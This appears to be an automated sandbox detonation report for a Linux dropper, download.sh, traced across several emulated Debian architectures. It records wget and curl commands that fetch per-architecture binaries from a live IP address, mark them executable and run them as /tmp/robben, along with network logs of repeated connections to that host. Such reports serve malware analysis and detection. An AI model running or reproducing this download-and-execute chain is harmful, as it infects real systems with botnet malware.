[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh gdm3-config-err-6vKEXU gdm3-config-err-75peOg robben snap-private-tmp systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-ModemManager.service-kHviKP systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-colord.service-mDLQqd systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-polkit.service-BSaoYq systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-power-profiles-daemon.service-T1PveH systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-switcheroo-control.service-JN2eQG systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-logind.service-p3auxv systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-oomd.service-6VmU2D systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-systemd-resolved.service-IfRMP1 systemd-private-5cda7c8fdddf4d9db5d2c218af30a094-upower.service-i2ODYz]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | udp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.58:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.59:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | canonical-bos01.cdn.snapcraftcontent.com | udp |
| US | 91.189.91.43:443 | canonical-bos01.cdn.snapcraftcontent.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
| US | 8.8.8.8:53 | _http._tcp.se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | _http._tcp.security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | security.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| US | 8.8.8.8:53 | se.archive.ubuntu.com | udp |
| GB | 185.125.190.82:80 | security.ubuntu.com | tcp |
| SE | 194.71.11.165:80 | se.archive.ubuntu.com | tcp |
| US | 8.8.8.8:53 | api.snapcraft.io | udp |
| GB | 185.125.188.55:443 | api.snapcraft.io | tcp |
Files
Analysis: behavioral1
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:31
Platform
debian12-armhf-20240418-en
Max time kernel
78s
Max time network
584s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/usr/bin/cat
[cat x86_64]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-timedated.service-ocZ6ND]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/usr/bin/cat
[cat mips]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/usr/bin/cat
[cat mipsel]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/usr/bin/cat
[cat arm]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/usr/bin/cat
[cat arm5]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/usr/bin/cat
[cat arm6]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/usr/bin/cat
[cat arm7]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/usr/bin/cat
[cat spc]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/usr/bin/cat
[cat sh4]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/usr/bin/cat
[cat i586]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/usr/bin/cat
[cat i686]
/usr/bin/chmod
[chmod +x download.sh robben systemd-private-458179b96d564bf6b593c47227ffd8bc-ntpsec.service-iJh5rL systemd-private-458179b96d564bf6b593c47227ffd8bc-systemd-logind.service-OhJ67W]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 1.1.1.1:53 | debian12-armhf-20240418-en-4 | udp |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 1.1.1.1:53 | 0.debian.pool.ntp.org | udp |
Files
Analysis: behavioral4
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:53
Platform
debian9-mipsbe-20240611-en
Max time kernel
86s
Max time network
114s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben systemd-private-dcc3d7e240784f46a17905593cd82390-systemd-timedated.service-KgbMrj]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |
Files
Analysis: behavioral5
Detonation Overview
Submitted
2024-08-22 21:53
Reported
2024-08-23 00:55
Platform
debian9-mipsel-20240226-en
Max time kernel
286s
Max time network
315s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
| N/A | /tmp/robben | /tmp/robben | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/robben | /tmp/download.sh | N/A |
Processes
/tmp/download.sh
[/tmp/download.sh]
/usr/bin/wget
[wget http://158.51.127.106/bins/x86_64]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/x86_64]
/bin/cat
[cat x86_64]
/bin/chmod
[chmod +x download.sh robben systemd-private-6959615890b94d28b77e9e6230635170-systemd-timedated.service-VwZarq]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mips]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mips]
/bin/cat
[cat mips]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/mipsel]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/mipsel]
/bin/cat
[cat mipsel]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm]
/bin/cat
[cat arm]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm5]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm5]
/bin/cat
[cat arm5]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm6]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm6]
/bin/cat
[cat arm6]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/arm7]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/arm7]
/bin/cat
[cat arm7]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/spc]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/spc]
/bin/cat
[cat spc]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/sh4]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/sh4]
/bin/cat
[cat sh4]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i586]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i586]
/bin/cat
[cat i586]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
/usr/bin/wget
[wget http://158.51.127.106/bins/i686]
/usr/bin/curl
[curl -O http://158.51.127.106/bins/i686]
/bin/cat
[cat i686]
/bin/chmod
[chmod +x download.sh robben]
/tmp/robben
[./robben Payload]
Network
| Country | Destination | Domain | Proto |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp | |
| US | 158.51.127.106:80 | tcp |